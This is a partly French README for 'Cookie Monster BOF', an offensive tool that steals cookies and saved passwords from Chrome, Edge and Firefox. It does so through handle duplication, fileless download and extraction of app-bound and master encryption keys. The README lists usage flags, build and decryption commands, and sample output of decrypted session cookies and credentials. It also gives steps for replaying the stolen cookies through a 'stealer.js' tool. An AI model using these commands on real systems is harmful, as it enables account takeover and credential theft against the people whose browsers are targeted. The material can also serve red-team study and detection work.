
Outil basé sur BOF pour extraire les cookies et identifiants des navigateurs Chrome, Edge et Firefox via duplication de handles et téléchargement sans fichier, avec support du déchiffrement hors ligne.
Volez les cookies des navigateurs Edge, Chrome et Firefox grâce à un BOF !
Cookie Monster BOF extraira la clé maître WebKit et la clé de chiffrement liée à l'application (App Bound Encryption Key) pour Edge et Chrome, localisera un processus de navigateur ayant un handle vers les fichiers Cookies et Login Data, copiera le(s) handle(s) puis téléchargera les fichiers cibles sans les écrire sur le disque.
Une fois les fichiers Cookies/Login Data téléchargés, le script de déchiffrement Python peut être utilisé pour extraire ces secrets ! Le module Firefox analysera le fichier profiles.ini pour localiser les fichiers logins.json et key4.db et les télécharger. Un dépôt GitHub distinct est référencé pour le déchiffrement hors ligne.
Mises à jour Chrome & Edge 127+ : les nouveaux cookies du navigateur Chromium (v20) utilisent la clé liée à l'application (app bound key) pour chiffrer les cookies. Par conséquent, cela rend la récupération de la app_bound_encrypted_key plus difficile. Grâce à snovvcrash, ce processus peut être accompli sans avoir à élever vos privilèges. Le hic, c'est que votre processus doit s'exécuter depuis le répertoire d'application du navigateur web, c'est-à-dire qu'il doit être injecté dans Chrome/Edge ou qu'une beacon doit être lancée depuis le même répertoire d'application que le navigateur.
Déchiffrez les cookies en tant que SYSTEM sans avoir à injecter dans le processus du navigateur ! Merci à @sdemius pour avoir découvert comment déchiffrer la fonction PostProcessData de Chrome et à @b1scoito pour son explication ! Chrome 137+ a encore modifié la fonction PostProcessData(), merci à @runassu d'avoir trouvé la solution !
La dernière mise à jour a ajouté le déchiffrement de la clé maître WebKit grâce à @M1ndo. La clé maître est automatiquement déchiffrée en même temps que la clé liée à l'application. Pour l'utiliser, ajoutez la clé au script de déchiffrement Python. Cette clé est principalement utilisée lorsque des profils itinérants sont en cours d'utilisation, pour les mots de passe stockés dans Edge ou les mots de passe plus anciens.
Usage: cookie-monster [--chrome || --edge || --system <Local State File Path> <PID> || --firefox || --chromeCookiePID <PID> || --chromeLoginDataPID <PID> || --edgeCookiePID <PID> || --edgeLoginDataPID <PID> ] [--cookie-only] [--key-only] [--login-data-only] [--copy-file "C:\Folder\Location\"]
cookie-monster Examples:
cookie-monster --chrome
cookie-monster --edge
cookie-monster --system "C:\Users\<USER>\AppData\Local\<BROWSER>\User Data\Local State" <PID>
cookie-moster --firefox
cookie-monster --chromeCookiePID <PID>
cookie-monster --chromeLoginDataPID <PID>
cookie-monster --edgeCookiePID <PID>
cookie-monster --edgeLoginDataPID <PID>
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to cookies and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to cookies and then copies the file to the CWD
--system, Decrypt chromium based browser app bound encryption key without injecting into browser. Requires path to Local State file and PID of a user process for impersonation
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if chrome PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
--edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
--key-only, only retrieve the app bound encryption key. Do not attempt to download the Cookie or Login Data files.
--cookie-only, only retrieve the Cookie file. Do not attempt to download Login Data file or retrieve app bound encryption key.
--login-data-only, only retrieve the Login Data file. Do not attempt to download Cookie file or retrieve app bound encryption key.
--copy-file, copies the Cookie and Login Data file to the folder specified. Does not use fileless retrieval method.
Assurez-vous que Mingw-w64 et make sont installés sur Linux avant de compiler.
make
Installer les dépendances
pip3 install -r requirements.txt
Utilisation
python3 decrypt.py -h
usage: decrypt.py [-h] -k KEY -o {cookies,passwords,cookie-editor,cuddlephish,firefox} -f FILE [--chrome-aes-key CHROME_AES_KEY]
Decrypt Chromium cookies and passwords given a key and DB file
options:
-h, --help show this help message and exit
-k KEY, --key KEY Decryption key
-o {cookies,passwords,cookie-editor,cuddlephish,firefox}, --option {cookies,passwords,cookie-editor,cuddlephish,firefox}
Option to choose
-f FILE, --file FILE Location of the database file
--chrome-aes-key CHROME_AES_KEY
Chrome AES Key
-mk MASTER_KEY, --master-key MASTER_KEY
Old key used in v10 passwords
Exemples : Déchiffrer le fichier des cookies Chrome/Edge
python .\decrypt.py -k "\xec\xfc...." -o cookies -f ChromeCookies.db
Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22
Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22
Déchiffrer les cookies Chrome avec la clé AES Chrome
python3 decrypt.py --chrome-aes-key '\x8e\....' -k "\x03\...." -o cuddlephish -f ChromeCookies.db
Cookies saved to cuddlephish_2025-07-03_01-53-57.json
Déchiffrer le fichier des cookies Chrome/Edge et l'enregistrer au format json
python .\decrypt.py -k "\xec\xfc...." -o cookie-editor -f ChromeCookies.db
Results Example:
Cookies saved to 2025-04-11_18-06-10_cookies.json
Importer le fichier JSON des cookies avec https://cookie-editor.com/
Déchiffrer le fichier des mots de passe Chrome/Edge
python3 decrypt.py -o passwords -f EdgePasswords.db -k '\xf9\x...' -mk '\xf3\x..'
URL: https://test.com/
Username: adgf
Password: pass
Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty
Déchiffrer les cookies et les identifiants stockés de Firefox :
https://github.com/lclevy/firepwd
Ajout de l'option cuddlephish dans le script de déchiffrement, qui devrait permettre d'utiliser le cookie avec https://github.com/fkasler/cuddlephish
# Decrypt Cookies
python3 decrypt.py -k "\xec\xfc..." -o cuddlephish -f ChromeCookies.db
# Clone Project
cd
git clone https://github.com/fkasler/cuddlephish
cd cuddlephish
# Install Dependencies Example on Debian
curl -fsSL https://deb.nodesource.com/setup_23.x -o nodesource_setup.sh
sudo -E bash nodesource_setup.sh
sudo apt-get install nodejs
npm install
# Import Cookies
cp ~/cookie-monster/cuddlephish_YYYY-MM-DD_HH-MM-SS.json .
node stealer.js cuddlephish_YYYY-MM-DD_HH-MM-SS.json
Ce projet n'aurait pas pu être réalisé sans l'aide de Mr-Un1k0d3r et de ses incroyables vidéos saisonnières ! Je recommande vivement de regarder ses leçons !!!
Cookie Webkit Master Key Extractor:
https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download:
https://github.com/fortra/nanodump
Decrypt Cookies and Login Data:
https://github.com/login-securite/DonPAPI
App Bound Key Decryption:
https://gist.github.com/snovvcrash/caded55a318bbefcb6cc9ee30e82f824
Decrypt Chrome 137+ Cookies
https://github.com/runassu/chrome_v20_decryption